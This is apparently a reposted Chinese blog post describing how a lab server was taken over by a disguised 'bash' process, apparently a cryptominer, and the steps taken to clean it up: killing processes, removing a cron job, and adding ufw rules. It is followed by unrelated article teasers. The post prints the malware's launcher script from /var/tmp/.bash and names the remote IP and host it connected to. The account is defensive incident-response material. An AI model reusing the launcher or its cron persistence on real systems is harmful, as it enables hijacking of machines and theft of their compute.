vb.net服务器启动后cpu占用了70_记一次服务器被异常程序占用的解决过程(怀疑黑客攻击)...

最近在跑实验,但是突然发现程序运行变慢,然后top命令查看程序运行情况,发现有异常进程,名字叫 bash,占用 2400% CPU计算资源。

4353eb2a9a944f51e79e11bcdd11cf7c.png

刚开始怀疑是挖矿程序,因实验室网络IP为教育网公网,怀疑被攻击,网上查了些资料,并参考了下面博客:

记一次服务器被挖矿程序占用的解决过程_dabao87的博客-CSDN博客_服务器被挖矿​blog.csdn.net
19b7f862213ba5ddef539a6e988141e6.png

通过搜索这个进程名字,发现异常文件 /var/tmp/.bash/bash

find / -name bash

2792a7b249eb429660c0b338c5a7b29a.png

打开这个脚本,发现脚本语言如下:

c1c93ad5d2a906ca2632fa7a8962c31c.png
#!/bin/bash
cd -- /var/tmp/.bash
mkdir -- .bash
cp -f -- x86_64 .bash/bash
./.bash/bash  -k -c
rm -rf .bash

这个分明是不断消耗CPU资源,不断递归创建删除文件的恶意脚本,将脚本文件删除之后,用kill命令将程序id杀死后计算机恢复。因为前期实验室密码设置的过于简单,重新修改了密码,提醒大家如果服务器IP是公网IP要谨慎一些。

事情还没完,太讨厌了

更新,在下午解决问题之后以为服务器好了,但是晚上又出现了新的 bash进程,在咨询了遇到同样问题的老哥 @yr15 之后,得知有可能被设置了定时任务,cron定时启动bash命令。

8968b0180997b63737b0a4e4f1e7ab11.png

ecd652c7441e03d0f3a76522836f0181.png

可以看到这个脚本是2020年10月20号写入的。把他删了希望完事了。太讨厌了!!

再更,解决后第二天它又出现了,没错是又出现了~~,然后差点想重装系统,最后试了一下将定时服务关闭,将进程杀死。

停止定时任务命令:

service crond stop

可能是定时任务里面保存了那个脚本的相关东西,现在好像一天没有出现了。

再更:

病毒换了策略,它建立了一个tcp连接来入侵我们电脑,但是为什么会这样还没整清楚

netstat -anp | grep bash
tcp        0      0 ***.***.91.12:35910      51.79.73.21:80          ESTABLISHED 25782/-bash

这个ip 51.79.73.21:80 是加拿大的。

开启了防火墙:

root@xuan:~# sudo ufw enable
Command may disrupt existing ssh connections. Proceed with operation (y|n)? y
Firewall is active and enabled on system startup
root@xuan:~# sudo ufw deny 35910
Rule added
Rule added (v6)
root@xuan:~# sudo ufw status
Status: activeTo                         Action      From
--                         ------      ----
35910                      DENY        Anywhere                  
35910 (v6)                 DENY        Anywhere (v6) 禁止那个ip tcp连接
sudo ufw deny from 51.79.73.21

root@xuan:~# netstat -anp | grep bash

tcp 0 0 **.30..7*9:36024 51.79.73.21:80 ESTABLISHED 810/-bash

lsof -p 810

->eugen.whitehat.at:http (ESTABLISHED)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/455330.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

3gp文件格式研究 (转windcao的专栏)

序言 06我开始做3gp文件的播放器,但是关于3gp的文档太少了也很难找,在网友luxh的帮助下,我终于有了第一份关于3gp文件格式的文档《ISO/IEC 14496-12,ISO媒体文件格式》.在此真心感谢luxh的贡献.当然了是英文版的,有文档就不错了.为了便于查阅和理解,我把之后陆续找…

Android开发必用工具及其进阶途径

三百六十行,行行出状元,怎么样才能在Android行业中当个状元了,开发过程中的高效、自我能力的提升显得至关重要,步入IT行业更是要时时刻刻学习,新技术更新快,今天将介绍一下Android开发中必用工具及其进阶途…

MySQL遇到check the manual that corresponds to your MySQL server version for the right syntax错误

原来是MySQL表中不能包含关键字 转载于:https://www.cnblogs.com/flycoding/p/7088465.html

Python脚本实现图片加水印

起步 图片是指由图形、图像等构成的平面媒体,有形式的事物,我们看到的,是图画、照片、拓片等的统称。 为了保护一些原创图片的版权,某些时候我们需要在图片上面,加上水印,当然你可以用Photoshop来做,只不过如果图片数量过多,亦或者图片的动态生成的时候…

yarn 怎么查看有多个job在跑_flink on yarn 模式下提示yarn资源不足问题分析

背景在实时计算平台上通过YarnClient向yarn上提交flink任务时一直卡在那里,并在client端一直输出如下日志:(YarnClusterDescriptor.java:1036)- Deployment took more than 60 seconds. Please check if the requested resources are available in the Y…

MPEG-2TS码流编辑的原理及其应用(转载

[作者:辽宁电视台 赵季伟] 在当今数字媒体不断发展、新媒体业务不断涌现 的前提下,实践证明襁褓中的新媒体只有两种经营方略可供选择:或是购买并集成整套节目,或是低成本深加工新节目,再不可能去按照传统生产模式…

Python中的yield详解

阅读别人的python源码时碰到了这个yield这个关键字,各种搜索终于搞懂了,在此做一下总结: 通常的for…in…循环中,in后面是一个数组,这个数组就是一个可迭代对象,类似的还有链表,字符串&#xf…

shell循环结构之while循环

while循环 1) while CONDITION; dostatementstatement<改变循环条件真假的语句>done 编写脚本&#xff0c;计算1---100的和 #!/bin/bash#sum0i1while [ $i -le 100 ]; dolet sum$sum$ilet i$i1doneecho $sum2) while true; do statementstatementdone #!/bin/bash#while …

python 管道队列_关于python:Multiprocessing-管道与队列

Python的多处理程序包中的队列和管道之间的根本区别是什么&#xff1f;在什么情况下应该选择一种&#xff1f; 什么时候使用Pipe()有优势&#xff1f; 什么时候使用Queue()有优势&#xff1f;Pipe()只能有两个端点。Queue()可以有多个生产者和消费者。何时使用它们如果需要两个…

pip默认使用国内镜像地址

很多小伙伴在ubuntu系统下,使用pip安装会很慢 以为安装源在国外服务器上面 今天小编就教大家配置成让pip默认从国内源中寻找安装包 首先CtrlAltT打开终端 进入家目录 cd ~在家目录中创建一个文件夹,命名为.pip mkdir .pip进入目录,并创建一个名为pip.conf的文件 cd .pip…

“大型票务系统”和“实物电商系统”的数据库选型

讨论请移步至&#xff1a;http://www.zhiliaotech.com/ideajam/idea/detail/423 相关文章&#xff1a; 《今天你买到票了吗&#xff1f;——从铁道部12306.cn站点漫谈电子商务站点的“海量事务快速处理”系统》 不能简单套用“实物电商系统”对“大型票务系统”做需求分析 “大…

FLV文件格式(Z)(转载)

刚才在看一些关于demux的东西&#xff0c;在处理flv格式的文件的时候&#xff0c;由于自己对flv文件的格式不了解&#xff0c;所以就比较云头转向&#xff0c;正好看到了一篇讲述flv文件格式的文章&#xff0c;写的比较明白&#xff0c;所以就转过来了。O(∩_∩)O~flv头文件比较…

mysql-5.7中的innodb_buffer_pool_prefetching(read-ahead)详解

一、innodb的read-ahead是什么&#xff1a; 所谓的read-ahead就是innodb根据你现在访问的数据&#xff0c;推测出你接下来可能要访问的数据&#xff0c;并把它们(可能要访问的数据)读入 内存。 二、read-ahead是怎么做到的&#xff1a; 1、总的来说read-ahead利用的是程序的局部…

python compare excel_python简单操作excle的方法

Python操作Excle文件&#xff1a;使用xlwt库将数据写入Excel表格&#xff0c;使用xlrd 库从Excel读取数据。从excle读取数据存入数据库1、导入模块&#xff1a;import xlrd2、打开excle文件&#xff1a;data xlrd.open_workbook(excel.xls)3、获取表、行/列值、行/列数、单元值…

collections系列

class Counter(dict):  Counter类继承dict类、继承了dict的所有功能计数器&#xff1a; 例&#xff1a;import collections obj collections.Counter(sdkasdioasdjoasjdoasd) print(obj)得&#xff1a;Counter({s: 5, d: 5, a: 4, o: 3, j: 2, k: 1, i: 1}) 拿到前几位&…

Python中的虚拟环境-virtualenv

更低层次: virtualenv virtualenv 是一个创建隔绝的Python环境的 工具。virtualenv创建一个包含所有必要的可执行文件的文件夹&#xff0c;用来使用Python工程所需的包。 它可以独立使用&#xff0c;代替Pipenv。 通过pip安装virtualenv&#xff1a; $ pip install virtual…

mp4文件格式解析(一)

原文地址&#xff1a;mp4文件格式解析&#xff08;一&#xff09;作者&#xff1a;可下人间目前MP4的概念被炒得很火&#xff0c;也很乱。最开始MP4指的是音频&#xff08;MP3的升级版&#xff09;&#xff0c;即MPEG-2 AAC标准。随后MP4概念被转移到视频上&#xff0c;对应的是…

shiro身份验证测试

2019独角兽企业重金招聘Python工程师标准>>> 一、登录验证 1、首先在shiro.ini里准备一些用户身份/凭据&#xff0c;后面这里会使用数据库代替&#xff0c;如&#xff1a; [users] [main] #realm jdbcRealmcom.learnging.system.shiro.ShiroRealm securityManager…

shell if多个条件判断_萌新关于Excel VBA中IF条件判断语句的一点心得体会

作者:金人瑞 《Excel VBA175例无理论纯实战教程》学员最近正在学习郑广学老师的VBA 175例教程&#xff0c;这是一篇新手向的文章&#xff0c;也是一个新手的总结&#xff0c;高手可以批评文章中的不足之处&#xff0c;也可以无视&#xff0c;VBA中的IF判断, 判断一般起到控制作…

Django笔记01-基础:一个完美主义的web框架

浅谈Web框架 一,什么是框架? 软件框架就是为实现或完成某种软件开发时,提供了一些基础的软件产品, 框架的功能类似于基础设施,提供并实现最为基础的软件架构和体系 通常情况下我们依据框架来实现更为复杂的业务程序开发 一个字,框架就是程序的骨架 二,框架的优缺点 可重…